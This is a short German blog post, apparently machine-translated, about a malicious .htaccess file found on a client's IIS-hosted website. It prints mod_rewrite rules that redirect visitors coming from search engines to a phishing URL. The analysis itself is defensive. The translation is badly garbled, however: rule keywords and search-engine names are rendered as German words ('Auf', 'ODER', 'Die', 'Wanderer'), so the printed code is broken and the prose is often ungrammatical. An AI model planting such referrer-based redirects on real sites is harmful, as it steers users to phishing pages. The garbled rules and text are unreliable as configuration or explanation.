Tag-Archiv für » mod_rewrite «

Donnerstag, 22. Januar, 2009 | Autor:

Ich fand vor kurzem ein Problem mit der Website eines Kunden durch eine .htaccess Datei. Die Website wurde auf eine gehostete Windows- Server läuft IIS mit IISPassword, wodurch die Verwendung von .htaccess Dateien für die Einstellungen.

IISPassword nicht genau die selben Regeln wie bei folgen Apache jedoch. Wenn die. Htaccess Datei existiert, dann ist es Muss enthalten IISPassword-geeignete Regeln, sonst der Server nur die folgende Fehlermeldung zurück:

Error 500 given by IIS Password
Hier ist der Inhalt der Datei. Htaccess. Ich habe nur die letzte Umleitungs-URL geändert, um zu example.com angemessen darauf:

RewriteEngine Auf
RewriteCond %{HTTP_REFERER} .*google. * $ [NC,ODER]
RewriteCond %{HTTP_REFERER} .*aol. * $ [NC,ODER]
RewriteCond %{HTTP_REFERER} .*msn. * $ [NC,ODER]
RewriteCond %{HTTP_REFERER} .*yahoo. * $ [NC,ODER]
RewriteCond %{HTTP_REFERER} .*yandex. * $ [NC,ODER]
RewriteCond %{HTTP_REFERER} .*Wanderer. * $ [NC,ODER]
RewriteCond %{HTTP_REFERER} .*bereits. $ [NC]
RewriteRule .* http://siffy-Phishing-url.example.com [R,Die]

Wenn diese waren auf einem Server mit Apache mit mod_rewrite, die meisten Web-Nutzer, die direkt auf die richtige Website-Content gehen würde. Nur wenn sie die Website durch die in der. Htaccess aufgeführt Suchmaschinen und Indizes erreicht, würden sie an die siffy Phishing URL, die der Cracker will Opfer zu erreichen, umgeleitet werden.

Natürlich, der Cracker (oder vielleicht sogar eine automatisierte Wurm) nicht erkennen, dass der betreffende Server nicht einmal unterstützen diese mod_rewrite Regeln. Aber so oder so, das ist sehr beunruhigend, da kann ich viele Argumente darüber, ob die Website ist vorauszusehen Arbeit

Aktie